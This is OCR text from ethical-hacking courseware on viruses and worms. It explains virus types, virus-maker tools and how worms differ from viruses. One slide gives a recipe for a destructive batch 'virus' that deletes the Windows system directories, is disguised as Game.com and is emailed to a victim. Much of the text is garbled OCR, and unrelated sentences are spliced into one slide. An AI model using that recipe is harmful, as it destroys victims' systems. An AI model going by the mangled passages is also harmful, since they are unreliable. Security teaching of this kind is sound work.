  • 48. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker File Overwriting or Cavity Viruses CEH Cavity Virus overwrites a part of the host file with a constant (usually nulls), without increasingthe length of the file and preserving its functionality Sales and marketing management is the leading authority for executives in the sales and marketing management industries The suspect, Desmond Turner, surrendered to authorities at a downtown Indianapolis fast-food restaurant Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Null Original File Size: 45 KB Null Null N U ll Null Null Null Null Null ■2> a ■ 3 Null Infected File Size: 45 KB Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. F ile O v e r w r itin g o r C a v ity V iru s e s T h e s e are also k n o w n as s p a c e -fille r s since t h e y m a i n t a i n a c o n s t a n t file -s iz e w h i l e i n f e c t e d b y in s t a llin g t h e m s e l v e s i n t o t h e t a r g e t p r o g r a m . T h e y a p p e n d t h e m s e l v e s t o t h e e n d o f file s a n d also c o r r u p t t h e s t a r t o f files. T his t r i g g e r e v e n t f i r s t a c tiv a te s a n d e x e c u te s t h e v iru s c o d e , a n d l a t e r t h e o rig in a l a p p li c a t i o n p r o g r a m . S o m e p r o g r a m file s h a ve a re a s o f e m p t y sp ace . T his e m p t y sp ace is t h e m a in t a r g e t o f th e s e v iru s e s . T h e C a v it y V ir u s , a lso k n o w n as t h e Space F ille r V iru s , s to re s its c o d e in t h is e m p t y space. T h e v iru s in s ta lls it s e lf in t h i s u n o c c u p ie d space w i t h o u t a n y d e s t r u c t i o n t o t h e o rig in a l c o d e . It in s ta lls it s e lf in t h e file it a t t e m p t s t o in fe c t. T his t y p e o f v ir u s is r a r e ly used b e c a u s e it is d i f f i c u l t t o w r i t e . A n e w W i n d o w s file ca lle d th e P o r t a b l e E x e c u t a b le it d e s ig n e d f o r t h e fa s t lo a d in g o f p r o g r a m s . H o w e v e r , it lea ves a c e r ta in g ap in t h e f ile w h i l e it is b e in g e x e c u t e d t h a t can be used by t h e Space F ille r V ir u s t o i n s e r t its e lf. T h e m o s t p o p u l a r v ir u s f a m i l y is t h e CIH v ir u s . Original File Size: 45 KB I h .............................................................................^ PDF L >1 Infected File Size: 45 KB PDF FIGURE 7 .1 3 : File O v e r w ritin g o r C a v ity V iru s M odule 07 Page 1053 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 49. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker S p a r se I n fe c to r V ir u s e s M ir S parse In fe c to r Virus J Sparse infector virus infects only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range D iffic u lt to D e te c t J By infecting less often, such viruses try to minimize the probability of being discovered In fe c tio n Process Wake up on 15* of every month and execute code Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C S p a rse In fe c to r V iru se s Sparse i n f e c t o r v iru s e s in f e c t o n l y o c c a s io n a lly (e.g., e v e r y t e n t h p r o g r a m e x e c u t e d o r o n p a r t i c u l a r d a y o f t h e w e e k ) o r o n l y file s w h o s e l e n g t h s fa ll w i t h i n a n a r r o w r a n g e . By i n f e c t i n g less o f t e n , th e s e v iru s e s t r y t o m in i m i z e t h e p r o b a b i l i t y o f b e in g d is c o v e r e d . Wake up on 15th of every month and execute code FIGURE 7.14: Working of Sparse Infector Viruses M odule 07 Page 1054 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 50. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Companion/Camouflage Viruses I C EH A Companion virus creates a companion file for each executable file the virus infects A Therefore, a companion virus may save itself as notepad.com and every time a user executes notepad.exe (good program), the computer will load notepad.com (virus) and infect the system Virus infects the system with a file notepad.com and saves it in c:winntsystem32directory ... 1 Attacker 1 / £ N otepad.exe Notepad.com Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C C o m p a n io n /C a m o u fla g e V iru se s Com panion Viruses 4 T h e c o m p a n i o n v ir u s s to r e s it s e lf b y h a v in g t h e id e n t ic a l file n a m e as t h e t a r g e t e d p r o g r a m f i l e . As s o o n as t h a t f ile is e x e c u te d , t h e v ir u s i n f e c ts t h e c o m p u t e r , a n d h a rd d isk d a ta is m o d if ie d . C o m p a n io n v iru s e s use DOS t h a t r u n C O M file s b e f o r e t h e EXE file s are e x e c u te d . T h e v ir u s in s ta lls an id e n t ic a l C O M file a nd i n f e c ts t h e EXE files. S o u rc e : h t t p : / / w w w . c k n o w . c o m / v t u t o r / C o m p a n i o n V i r u s e s . h t m l H e re is w h a t h a p p e n s : S u p p o s e a c o m p a n i o n v ir u s is e x e c u t in g o n y o u r PC a n d d e c id e s it is t i m e t o in f e c t a file . It lo o k s a r o u n d a n d h a p p e n s t o f i n d a f ile c a lle d PGM.EXE. It n o w c r e a te s a file ca lle d P G M .C O M , c o n t a i n i n g t h e v iru s . T h e v ir u s u s u a lly p la n t s t h is file in t h e s a m e d i r e c t o r y as t h e .EXE file , b u t it c o u ld p la ce it in a n y d i r e c t o r y o n y o u r DOS p a t h . If y o u t y p e P G M a n d press E n te r, DOS e x e c u te s P G M .C O M in s te a d o f PG M .E XE . (In o r d e r , DOS w ill e x e c u te C O M , t h e n EXE, a n d t h e n BAT file s o f t h e s a m e r o o t n a m e , if t h e y a re all in t h e s a m e d ir e c t o r y . ) T h e v iru s e x e c u te s , p o s s ib ly i n f e c t i n g m o r e file s , a n d t h e n lo a d s a n d e x e c u te s PGM.EXE. T h e u ser p r o b a b l y w o u l d fa il t o n o t i c e a n y t h i n g is w r o n g . It is easy t o d e t e c t a c o m p a n i o n v i r u s j u s t by t h e p r e s e n c e o f t h e e x tr a C O M f ile in t h e s y s te m . M odule 07 Page 1055 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 51. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Virus infects the system with a file notepad.com and saves It In c:wlnntsystem32 directory Attacker V Notepad.exe Notepad.com FIGURE 7.15: Working of Companion/Camouflage Viruses M odule 07 Page 1056 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 52. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker c EH S h e ll V ir u s e s J (c ifw Ith Jl lUk it d M cM Virus code form s a shell aro u n d th e target host program 's co d e, making itself th e original program and host code as its sub-routine J [4 U « 1 Alm ost all boot program v iru se s are shell viruses Before Infection Original Program After Infection ‫ ־‬Virus Code--- > Original Program Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C Ilf S h e ll V ir u s e s A s h ell v ir u s c o d e f o r m s a la y e r a r o u n d t h e t a r g e t h o s t p r o g r a m 's c o d e t h a t can be c o m p a r e d t o an " e g g s h e l l / ' m a k in g its e lf t h e o rig in a l p r o g r a m a n d t h e h o s t c o d e its s u b r o u t i n e . H e re , t h e o rig in a l c o d e is m o v e d t o a n e w l o c a t io n b y t h e v iru s c o d e a n d t h e v iru s a s s u m e s its i d e n t it y . B efo re In fe c tio n Original Program A fte r In fe c tio n Virus Code Original Program FIGURE 7 .1 6 : W o rk in g o f S hell V iru s e s M odule 07 Page 1057 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 53. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker CEH F ile E x te n s io n V ir u s e s F ld r O tio s oe p n File Extension Viruses General J F extension viruses change the ile extensions of files Search Folder views You can apply the view (such as Detais or Icons) that you are us*1g for this folder to al folders of this type Apply to Folders J .TX is safe a it indicates a pure text T s file Advanced settings: J W extensions turned off, if som ith eone sends you a file nam B D T.V S ed A .TX B , you w only see B D T ill A .TX Fies and Folders □ Always show icons, never thumbnails I I Always show menus @ Display Me icon on thumbnails J If you have forgotten that extensions are turned off, you m think this isa ight text file and open it 0 J This is an executable Visual B asic Script virus file and could do serious dam age y □ Display He size nfoimation m folder tps Display the full path in the title bar J l Hdden Mes and folders O Don‫ ז‬show hidden files, folders, or dnves (§) Show hidden files, folders, and dnves Hide cmgty dnves in the Computer folder V . Ude folder merge conflicts Restore QfifoJls J Counterm easure isto turn off "Hide file extensions" in W indows * Py P* Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C F ile E x te n s io n V iru s e s u S o u rc e : h t t p : / / w w w . c k n o w . c o m / v t u t o r / F i l e E x t e n s i o n s . h t m l © File e x t e n s io n v iru s e s c h a n g e t h e e x te n s io n s o f file s Q .TXT is safe as it in d ic a te s a p u r e t e x t file Q W i t h e x te n s io n s a re t u r n e d o ff, if s o m e o n e se nd s y o u a f ile n a m e d BAD.TXT.VBS, y o u can o n l y see BA D .T X T Q If y o u h a ve f o r g o t t e n t h a t t h e e x te n s io n s a re a c t u a lly t u r n e d o ff, y o u m i g h t t h i n k t h is is a t e x t file a n d o p e n it 0 This is an e x e c u t a b l e V is u a l Basic S c r ip t v i r u s file t h a t c o u ld d o s e rio u s d a m a g e T h e c o u n t e r m e a s u r e is t o t u r n o f f " H i d e f i l e e x t e n s i o n s " in W i n d o w s , as s h o w n in t h e f o l l o w i n g scree nsh ot: M odule 07 Page 1058 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 54. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Folder O ptions General View Search Folder views You can apply the view (such as Detate or Icons) that you are usng for this folder to al folders of ths type. Apply to Folders Reset Folders Advanced settngs Frfesand Folders H I Always show icons, never thumbnate (‫ )־־‬Always show menus @ Display f<e icon on thumbnab @ Display W size *formation n folder tps e □ Display the h i path n the Mle bar i i Hidden Mes and folders O Don‫ ז‬show hdden Wes. folders, or drrves (•) Show hrfdenMes. folders, and dnves V hfcde empty dnves n the Computer folder □ HkJe exlenswns for known Me types y . Ude folder merge corftcts J c a orc fa u lts OK Cancel App*y FIGURE 7.17: Uncheck Hide File Extensions M odule 07 Page 1059 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 55. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker “ ■on and Intrusive Viruses Add-On V iru ses c EH (crtifwd IU mjI NMhM Add-on viruses append theircode to the host code without making any changes to the latter or relocate the host code to insert their own code at the beginning Original Program Original Program Original Program J.V R M .. I I I I I I I I I I I I I I I I I I I I viral code V iru ses Original Program Original Program Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited A d d-o n a n d In tru s iv e V iru s e s Add-on Viruses M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t co d e . H o w e v e r , t h e v ir u s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e f ile is c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d . A d d -o n Viruses Original Program Original Program 1 1 — 1 . . ^ ................................................................................ JUMP. FIGURE 7.18: Working of Add-on Viruses M odule 07 Page 1060 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 56. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Intrusive Viruses In tr u s iv e v iru s e s o v e r w r i t e t h e i r c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t's p r o g r a m c o d e o r s o m e t i m e s o v e r w r i t i n g o n l y p a r t o f it. T h e r e f o r e , t h e o r i g i n a l c o d e is n o t e x e c u te d p r o p e r ly . Original Program Original Program FIGURE 7.19: Working of Intrusive Viruses M odule 07 Page 1061 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 57. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Transient and Terminate and Stay Resident Viruses EH Basic In fe c tio n T echniques A . Direct Action or Transient Virus J the controls of the host code to where Terminate and Stay Resident Virus (TSR) f Remains permanently in the memory during the t I] resides J Selects the target program to be modified and J ^___ ^ entire work session even after the target host's program isexecuted and terminated; can be removed only by Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. T r a n s i e n t a n d T e r m i n a t e a n d S ta y R e s i d e n t V i r u s e s Transient Viruses T r a n s ie n t v iru s e s t r a n s f e r all c o n t r o l t o t h e h o s t c o d e w h e r e t h e y re s id e , s e le c t t h e t a r g e t p r o g r a m t o be m o d i f i e d , a n d c o r r u p t it. Term inate and Stay Resident V irus (TSR) TSR v iru s e s r e m a i n p e r m a n e n t l y in m e m o r y d u r in g t h e e n t i r e w o r k se s s io n , e v e n a f t e r t h e t a r g e t h o s t p r o g r a m is e x e c u t e d a n d t e r m i n a t e d . T h e y can be r e m o v e d o n l y b y r e b o o t i n g t h e s y s te m . M odule 07 Page 1062 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 58. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker W riting a Sim ple Virus Program C EH Send the Game.com file as an email attachment to a victim Create a batch file Game.bat with this text 0 echo off del c:winntsystem32*.* del c :winnt*.* Convert the Game.bat batch file to Game.com using bat2com utility When run it deletes core files in the WINNTdirectory making Windows unusable , Copyright © by E& Caincil. All Rights Reserved. Reproduction is Strictly Prohibited. W ritin g a S im p le V iru s P r o g r a m ------- For d e m o n s t r a t i o n p u r p o s e s , a s im p le p r o g r a m t h a t can be u sed t o ca use h a r m t o a t a r g e t s y s te m is s h o w n h e re : 1. C re a te a b a tc h file G a m e . b a t w i t h t h e f o l l o w i n g t e x t : text @ echo off delete c:winntsystem32*.* delete c:winnt*.* 2. C o n v e r t t h e G a m e . b a t b a tc h f ile t o G a m e . c o m u s in g t h e b a t 2 c o m u t i l i t y 3. A ssign Icon t o G a m e . c o m u s in g W i n d o w s file p r o p e r t ie s scree n 4. Send t h e G a m e . c o m f ile as an e m a il a t t a c h m e n t t o a v i c t i m 5. W h e n t h e v i c t i m r u n s t h is p r o g r a m , it d e le t e s c o re file s in t h e W I N N T d ir e c t o r y , m a k in g W i n d o w s u n u s a b le T h e v i c t i m w o u l d h a ve t o r e i n s t a l l W i n d o w s , c a u s in g p r o b l e m s t o a lr e a d y sa ved files. M odule 07 Page 1063 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 59. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker Terabit Virus Maker ‫וי! וי־•• י י‬ ‫. ״י‬I ‫! ־ז־‬ M Disable W indow s Security Center ^ H ^ i d Opening Copy,Move Window | Avoid Opening Gpedit ^ 'M Disable W indow s Them es Avoid Opening Media Player | | Format All Hard Drives Avoid Opening Mozilla Firefox ^ ^ Funny Keyboard Avoid Opening M sConfig ^ | Funny M ouse Avoid Opening Notepad ^ | Funny Start Button M Avoid Opening Wordpad M Gradually Fill System Volum e Avoid Opening Yahoo M esseng er ^ Disable W indow s Security Essentials Hide Desktop Icons Add 30 User Accounts to W indow s ^ M Hide Folder Option Menu Always Clean Clipboard ^ | Hide Taskbar Alw ays Log Off ^ | Lock All D rives/old ers M Close Internet Explorer Every 10 Sec 0 M Delete All Files In Desktop | Delete All Files In My Documents ^ Delete W indow s Fonts H Delete W indow s Screen Savers Lock Internet Explorer Option Menu Mute System Volum e Open/Close CD-ROM Every 10 Sec | Play B eep Sound Every Sec M Rem ove Desktop Wallpaper f | Disconnect From Internet B Rem ove Run From Start Menu Disable Automatic Updates ^ | Rem ove Start Button Disable Command Prompt ^ 0 Rem ove W indow s Clock Disable Printer Disable Regedit ^ Disable Screen Saver ^ M Disable System Restore Disable Task Manager Slow Down PC Speed f l Spread with Floppy , Folders 0 Stop SQL Server M Swap M ouse Buttons B Transparent Explorer W indows Disable W indow s Firewall ^ ^ Turn off Computer After 5 Mm Disable W indow s Installer ■ t f Turn Off Monitor || Q sp m‫׳‬uQm2 ia ie 0 ■ lnLU °« COUJbCopyright © by E( T e ra B IT V iru s M a k e r T e ra B IT V ir u s M a k e r is a v ir u s t h a t is m o s t l y d e t e c t e d b y all a n t i v i r u s s o f t w a r e w h e n s c a n n e d . T his v ir u s m o s t l y d o e s n ' t h a r m t h e PC, b u t it can d is a b l e t h e a n t i v i r u s t h a t is in s ta lle d o n t h e s y s te m f o r a s h o r t t i m e . M odule 07 Page 1064 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 60. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker •• TeraBn Virus Maker 3 . ■ Avoid Opening Calculator H M Avoid Opening Copy,M ove W indow Avoid Opening Gpedit H | Disable W indow s Security Essentials J f Disable W indow s Them e s H Avoid Opening Media Player Avoid Opening Mozilla Firefox jfl Form at All Hard Drives H Funny Keyboard M Avoid Opening MsConfig Avoid Opening Notepad H ^ H Avoid Opening Wordpad Avoid Opening Yahoo M essenger M A d d JO User Accounts to W indow s 3 | Close Internet Explorer Every M Delete All Files In Desktop ft Gradually Fill System Volum e J Hide Desktop Icons M Hide Folder Option Menu 1 Sec £ 0 Ru n C u s to m C o m m an d Lock Internet Explorer Option Menu M Mute System Volum e 10Sec Delete W indow s Fonts J | Open/Close CD-ROM Every M Play Beep Sound Every Sec Delete W indow s Screen Savers '/I Rem ove Desktop Wallpaper M Delete All Files In My Documents 0 Funny Mouse Funny Start Button ^ Hide Taskbar M Lock All Drives,Folders M Alw ays Clean Clipboard M Alw ays Log Off Disable W indow s Security C enter M Disconnect From Internet ^ Rem ove Run From Start Menu ^ Disable Automatic Updates H Disable Com m and Prompt F Name After Instal ie Rem ove Start Button B fake KB(s) to virus. | Disable Printer M Disable Regedit 0 H Disable Screen Saver Disable System Restore Q Disable Task Manager M Disable W indow s Firewall ■ Disable W indow s Installer £ Rem ove W indow s Clock f Slow Down PC Speed | Swap Mouse Buttons Cl Spread with Flo pp y, Folders U S«>P SQL Server 0 Fie Name exe B jf l Run Virus with W indows Transparent Explorer W indow s T u rn off Com pu te r After Min Cr eat e Vi rus | ■ Tu rn Off Monitor About 5 x t E FIGURE 7.20: TeraBIT Virus Maker M odule 07 Page 1065 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 61. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker JPS Virus M aker and DELmE's Batch Virus M aker IP (Vu Mkr3 ) S ir s a e .0 n co ?‫| *ץי‬O rO o f to < ‫ נ‬V p r e ‫י‬ 0 ie b s Me ncs t lceu c e ®ciofl 1Sa UwB n QneUrpord et o w p jlos iag s « rr | > h n Sa LclD | Sa W Ugc Oe14D T»| pmoa a k ( * * tSx pn0c a « 3 ka RstTe ee « n SaPre | paat r Py nPoo bWXSn N SnSa | * e riffte Cr eF &e»n| e edpm t dU oto ie 4n3s BeSre O e HeDcnrsFld U cen fDih| M ouet oe r H. .Pt | i* M f O • D M | DcoJT M fe # o m etA 4 m c Mt•il XlFa | D t M.M Fa e A mf a ee p f le 3 e M(• l Pg m | D t M be Im e A hM e e eF le TeL*Rsat 1 DMtWl h a etr ee d D t M ouet D t M uc e e y cms1 e e yM le D n le n D t HPfM | ae r m la Dls« **>«| a tM D t *Is*M | ee la m C A c is | ra Crp DMMPan | c e yc u ! ‫ זיי‬FtcioTDa MM( ‫ יח‬roano « * g ‫״‬ * (M•| d a v t ‫יין‬ Mte | |tf a fr l« ” O t | |nl a e «f la 0 FV»ta< O Loo Off V 5A rIr^ I I ‫יייי‬ r* 'le H 0 Turn Off O Hibiinofco 0 No‫־׳‬e fl Sre Nm I^ o o ^ evr a o rd T x -H 0WNea » • opd t D t C utr | e ea la la lc o D t Acm e ect le O ttP l M v IMt.U• - c( (M•| M D» | *a Mt• | a D i•od | a W la DtO a e eu k la llo 0* S * e rf» | wfig y o c m g fe y o w & cm o| 9 0 0 J P S V iru s M a k e r D E L m E 's B a tc h V iru s M a k e r Copyright @ by E lrC lM K i. All Rights Reserved. Reproduction is Strictly Prohibited. JP S V i r u s M a k e r a n d D E L m E 's B a t c h V i r u s M a k e r JP S Virus M a k e r JPS V ir u s M a k e r is a t o o l t o c r e a t e v ir u s e s . It a lso has a f e a t u r e t o c o n v e r t a v ir u s i n t o a w o r m a n d can be u sed t o d is a b l e t h e n o r m a l h a r d w a r e o f t h e s y s te m . M odule 07 Page 1066 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 62. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker 3PS ( V iru s M a k e r 3.0 ) ‫ם‬ Disable R e?sby □ Hrie ServKet □ Disable MsCortig □ Hide Outlook E *p te u □ Disable T a t* Manager □ H d e W n d o w s Clock □ Disable Yahoo □ Hide Desktop Icon* □ Disable M e d a Pa^ei □ H id e A IP io c c e s s n Taskmgi □ Disable Internet Explore! □ Hide A l Tasks n Taskmgi □ Disable T m e Q Hide R m □ Disable Gk x «> Pokey □ Change Explorer Caption □ Disable W n d o w s Explorer □ □ Disable Norton Anb V iu s □ □ Disable M cAtee Anb V iu s □ Remove Folder Options □ Disable Note Pad □ Lock Mouse & Keyboard □ Disable W a d Pad □ M ute Sound □ Disable W nd o w s □ Alw ays C D flO M □ Disable DHCP d e n t O T u n O H M o n to r □ Disable Taskbai □ C ta jy Mouse □ Disable Start Button □ Destroy T askbat □ Disable MSN Messengei □ Destroy OIBnes (VM essengetl □ Disable CMD □ Destroy Protected Stiotage □ Disable S e c u iy Center □ Destroy A u d o Service □ Disable System R e s id e □ Destroy Clpboerd □ Disable Control Panel □ T e<m»Mle W n d o r n □ Disable Desktop Icons □ Hide C usot □ Disable S a e e n Save* □ Auto Startup O Restart O Log OH Name A fter In sta l: Ru n d i3 ; Clear W n d o m X P Swap Mouse Batons O T u n OH O Htm nate Server Name: O None Sende1 .exe JPS V tn u M aker 3 0 FIGURE 7.21: JPS Viruse Maker Screenshot D E Lm E 's Batch Virus M a k e r ( / A 1 DELmE's Ba tch V ir u s M a k e r is a s im p le t o o l t h a t a llo w s y o u t o c r e a te y o u r o w n c h o ic e o f b a t file v iru s e s t o s u it y o u r tasks. ^LJxj ‫ יי‬Oang• Uaar PaMword To qwarty I uaar *ujeememe"■. Qwwfy Swp Mau— Buaong | Oanga Uwr Paa—o>d| ‫׳‬w* Crtah •tMartCorrpa•‫׳‬ co ~%0>xn*>b* <»t ‫ ־‬VOxratftM ‫־‬ •cto •cto M r 0 ‫> ־‬xraM>bM •tMart *0‫>׳־־‬cra*fb« coart '0. ‫ >־‬a a * M H t a *t*tart‫’ ־־‬OXhM t o *» 9tHart %0 .xMb CK “‫>>־‬cr»M1bM •oart ~ XO»cr»*bM c •cto M •t■art 0O»0 a * bM coart ‫ »־־ ־‬a a#1b« * •cto Sp— HMSatoSg— | M agBo | OpfvOoe• a HfrVhaW a | H»B— cna| B u iS a M n O ID i* I *da Docunarta FaUar I Oa>»• H OocFtea O l t H Tm Hm aao CMcca* •cto H r ‫ ) * ־‬xyaah bM at ‫ ־‬U> •cto *at" 0» a W 1M tr •cto M r %0 ‫» ־‬cra#1b l at ‫־‬ a •cto iat“ %0»cr«#1 b « tr a •cto M r %0 ‫» ־‬aa*1 bM at ‫־‬ •cto M r “ %0>x7aM3bM at •cto M r %0 ‫> י‬x7a#t b t at ‫־‬ a •cto M r %0 ‫» ־‬a*tftbai at M r craihbal at CM• 0«— * PhgFlw | T>» La* Rx i | OMta% Oocu-rt■ | | H* O Fte• I DM» H fa tftw Itwf | I t * Ud P* O f t H Ptf F a aaa Ia DcMe M»*>4F«m | O a fc-* LrfcF— Pa*al» Hal & | C > Compuar r»M 0*i«% H um c I | C W k% Plcfcw | | | O tF jp riM M • N o t Fie E jecnaon To Ortete leg '6 0 r^r 0Mart *“ XO>>^SyMamO‫״‬v*‘-»AUTO€XEC RAT ****** pgJ o ugbT V wqwrt | WA» 1 ►‫ • ״י ס‬Wtw cw * ‫חיי‬My y o j Chang• How Pag• goo^• co*H Qpan Wab P«g» FIGURE 7 .2 2 : DELmE's B a tch V iru s M a k e r S c re e n s h o t M odule 07 Page 1067 Ethical Hacking and C ounterm easures Copyright © by EC-COlMCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 63. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker M odule Flow CEH V iru s and W orm s C on cep ts Types o f V iruses P en etratio n Testing I C ounter• m easures M a lw a re Analysis Copyright © by E& Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. M o d u le F lo w P r io r t o th is , w e h a ve d iscu sse d v a r io u s ty p e s o f v iru s e s . Now we w i ll discuss c o m p u t e r w o r m s a n d h o w t h e y a re d i f f e r e n t f r o m viru s e s . V iru s a n d W o rm s C o nc e p t M a lw a r e A nalysis T yp es o f V iruses C o u n te rm e a s u re s <4 / — C o m p u te r W o rm s ^ ) P e n e tra tio n T es tin g •V — This s e c tio n d e s c r ib e s w o r m s , w o r m a na lys is (S tu x n e t) , a n d a w o r m m a k e r ( I n t e r n e t W o r m M a k e r T h in g ). M odule 07 Page 1068 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 64. Ethical Hacking and Counterm easures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker C o m p u te r W o rm s CEH Computer worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction Most of the worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system Attackers use worm payload to install backdoors in infected computers, which turns them into zombies and creates botnet; these botnets can be used to carry further cyber attacks 0 Copyright © by EC auactl. All Rights Reserved. Reproduction is Strictly Prohibited. -C C o m p u te r W o rm s — ‫׳״ —יי‬ C o m p u t e r w o r m s a re m a l i c io u s p r o g r a m s t h a t r e p lic a te , e x e c u te , a n d s p re a d across n e t w o r k c o n n e c t i o n s i n d e p e n d e n t l y , w i t h o u t h u m a n i n t e r a c t i o n . M o s t w o r m s a re c r e a t e d o n l y t o r e p lic a te a n d s p re a d acro ss a n e t w o r k , c o n s u m i n g a v a ila b le c o m p u t i n g re s o u r c e s ; h o w e v e r , s o m e w o r m s c a r r y a p a y lo a d t o d a m a g e t h e h o s t s y s te m . A w o r m d o e s n o t r e q u i r e a h o s t t o r e p li c a t e , a lt h o u g h in s o m e cases o n e m a y a rg u e t h a t a w o r m ' s h o s t is t h e m a c h in e it has i n f e c t e d . W o r m s a re a s u b t y p e o f v iru s e s . W o r m s w e r e c o n s id e r e d m a in ly a m a in fra m e p ro b le m , but a fte r m ost o f th e w o rld 's s y s te m s w ere i n t e r c o n n e c t e d , w o r m s w e r e t a r g e t e d a g a in s t t h e W i n d o w s o p e r a t i n g s y s te m , a n d w e r e s e n t t h r o u g h e m a il, IRC, a n d o t h e r n e t w o r k f u n c t io n s . A t t a c k e r s use w o r m p a y lo a d s t o in s ta ll b a c k d o o r s in i n f e c t e d c o m p u t e r s , w h i c h t u r n s t h e m i n t o z o m b ie s a n d c r e a te s b o t n e t ; th e s e b o tn e ts can be used to carry o u t fu r t h e r cyber-attacks. M odule 07 Page 1069 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
  • 65. Ethical Hacking and Countermeasures Viruses and W orm s Exam 312-50 C ertified Ethical Hacker How Is a W orm D ifferen t from a V irus? Replicates on its own A worm takes advantage of file or information transport features on computer systems and spreads through the infected network automatically A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs but a virus does not Spreads through the Infected Network 4 • » Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. H ow Is a W o rm D iffe re n t fro m a V iru s? V ir u s W o rm A v ir u s is a file t h a t c a n n o t be s p re a d t o o t h e r A w o r m , a f t e r b e in g i n s t a l l e d o n a c o m p u t e r s u n le ss an i n f e c t e d file is r e p l i c a t e d s y s te m , can r e p lic a t e it s e lf a nd a n d a c tu a lly s e n t t o t h e o t h e r c o m p u t e r , s p re a d b y u sin g IRC, O u t l o o k , o r w h e re a s a w o r m does ju s t th e o p p o s ite . o t h e r a p p lic a b le m a ilin g p r o g r a m s . Files such as .c o m , .exe, o r .sys, o r a A w o r m ty p ic a lly does n o t m o d ify c o m b i n a t i o n o f t h e m a re c o r r u p t e d o n c e t h e any sto re d pro gram s. v ir u s r u n s o n t h e s y s te m . V iru s e s a re a l o t h a r d e r t o g e t o f f an in f e c te d As c o m p a r e d t o a v iru s , a w o r m can m a c h in e . be e a s ily r e m o v e d f r o m t h e s y s te m . T h e ir s p r e a d in g o p t i o n s a re m u c h less t h a n T hey have m o re s p re a d in g o p tio n s t h a t o f a w o r m b e c a u s e v iru s e s o n l y i n f e c t t h a n a v iru s . fi l e s o n t h e m a c h in e . TABLE 7.1: Difference between Virus and Worms M 